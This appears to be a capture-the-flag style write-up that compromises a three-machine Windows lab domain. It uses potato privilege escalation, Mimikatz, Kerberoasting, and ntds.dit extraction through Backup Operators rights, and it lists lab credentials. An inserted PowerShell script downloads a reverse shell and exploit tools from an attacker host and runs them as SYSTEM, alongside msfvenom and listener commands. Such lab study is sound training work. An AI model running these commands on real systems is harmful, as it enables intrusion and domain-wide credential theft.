Zeus
Network
Given:
- 192.168.167.0/24
Found:
- 192.168.167.158 DC
- 192.168.167.159
- 192.168.167.160
Creds
eric.wallows:EricLikesRunning800 (creds for .159)
db_user:Password123! (found in a file on .159)
o.foller:EarlyMorningFootball777 (retrieved using mimikatz from .159)
administrator:97db5c87465431b9091d47a58fe76483 (local admin on .160)
z.thomas:^1+>pdRLwyct]j,CYmyi (found in a document on .160)
Enumeration
Ping sweeping the subnet reveals three machines.
192.168.167.159
Enumeration
Initial Access
Using the provided credentials, we log in via WinRM.
Privilege Escalation
Checking our privileges, we hold a full set, including SeImpersonatePrivilege, which is all the potato family needs.
Transfer a reverse shell and JuicyPotatoNG, and we get a SYSTEM shell.
Post Exploitation
Get the proof
We see an SQL folder containing connection.sql with the credentials db_user:Password123!.
Transfer adpeas.ps1 and run it, and we identify the DC.
Transfer Mimikatz, and we retrieve the cleartext credentials o.foller:EarlyMorningFootball777.
192.168.167.160 CLIENT02
Enumeration
Initial Access
Using the credentials for o.foller, we use PsExec to access the machine.
Privilege Escalation
This session again holds SeImpersonatePrivilege, so we use PrintSpoofer to get a SYSTEM shell.
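The escalation used on both .159 and .160 follows the same pattern: confirm SeImpersonatePrivilege, pull the tools over, run a potato that hands the reverse shell to SYSTEM. The script below is an added example, not the writeup's own commands; the attacker address 192.168.45.200, the HTTP port 8000, the listener port 443 and the file names are assumptions.

```powershell
# Added example (not from the original writeup): the .159/.160 escalation chain.
# Assumptions: Kali serves the binaries over HTTP at 192.168.45.200:8000 and listens
# with nc on 443; rev.exe is an msfvenom reverse shell built for that listener.

function Test-ImpersonatePrivilege {
    # Returns $true when the current token holds SeImpersonatePrivilege. whoami /priv may list
    # it as "Disabled"; that only means it is not enabled yet, and the potato tools enable it
    # themselves, so presence in the token is what matters.
    $priv = whoami /priv
    return [bool]($priv | Select-String -Pattern '^SeImpersonatePrivilege\s' -Quiet)
}

if (-not (Test-ImpersonatePrivilege)) {
    Write-Warning 'SeImpersonatePrivilege not held; look for another vector (services, scheduled tasks, creds on disk).'
    return
}

$kali = 'http://192.168.45.200:8000'   # assumed attacker HTTP server
$dir  = 'C:\Windows\Temp'              # world-writable, usually not watched by AV exclusions though
foreach ($f in 'rev.exe', 'JuicyPotatoNG.exe', 'PrintSpoofer64.exe') {
    Invoke-WebRequest -UseBasicParsing -Uri "$kali/$f" -OutFile "$dir\$f"
}

# .159: JuicyPotatoNG. -t '*' tries both CreateProcessWithToken and CreateProcessAsUser;
# -p is the program launched as SYSTEM, so the nc listener receives a SYSTEM shell.
& "$dir\JuicyPotatoNG.exe" -t '*' -p "$dir\rev.exe"

# .160: PrintSpoofer. -c is the command run as SYSTEM through the named-pipe impersonation;
# -i would instead spawn it interactively in the current console (only useful on an RDP session).
& "$dir\PrintSpoofer64.exe" -c "$dir\rev.exe"

# On Kali beforehand:
#   msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.200 LPORT=443 -f exe -o rev.exe
#   python3 -m http.server 8000
#   nc -lvnp 443
```

Run one potato or the other, not both: each spawns its own SYSTEM process, and the second invocation fails if the first one's child still holds the listener. Delete the three binaries from C:\Windows\Temp once the SYSTEM shell is established.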
Post Exploitation
Get the proof
Using Mimikatz, we only retrieve the local administrator's NTLM hash, which Hashcat cannot crack.
In z.thomas's home folder, we find a Word document containing the credentials z.thomas:^1+>pdRLwyct]j,CYmyi.
192.168.167.158 DC
Enumeration
Initial Access
Use WinRM with z.thomas's credentials found on .160.
Get the flag
Privilege Escalation
Transfer SharpHound to the target, download the zip, and import it into BloodHound.
We see that z.thomas has GenericAll over d.chambers, who is a member of Backup Operators. First, perform a targeted Kerberoast attack:
python targetedKerberoast.py -v -d 'zeus.corp' -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' --dc-ip 192.168.167.158
Hashcat cannot crack the resulting hash, so we use the GenericAll right to reset d.chambers's password instead. Transfer powerview.ps1 to the machine and use it to set the new password.
Verify the new password with nxc, then log in using Evil-WinRM.
d.chambers belongs to the Backup Operators group, which grants SeBackupPrivilege.
That privilege lets us read files regardless of their ACLs, so we can retrieve the domain password hashes by copying ntds.dit with Robocopy's backup mode.
First, transfer the script file (I had to duplicate end characters for the script to work).
Now retrieve the ntds.dit file using Robocopy.
Retrieve the SYSTEM hive as well; it holds the boot key needed to decrypt the hashes in ntds.dit.
Download both to the Kali machine, and using secretsdump, we retrieve the domain admin's hash.
Post Exploitation
Using the hash, log in to the DC with Evil-WinRM (pass-the-hash).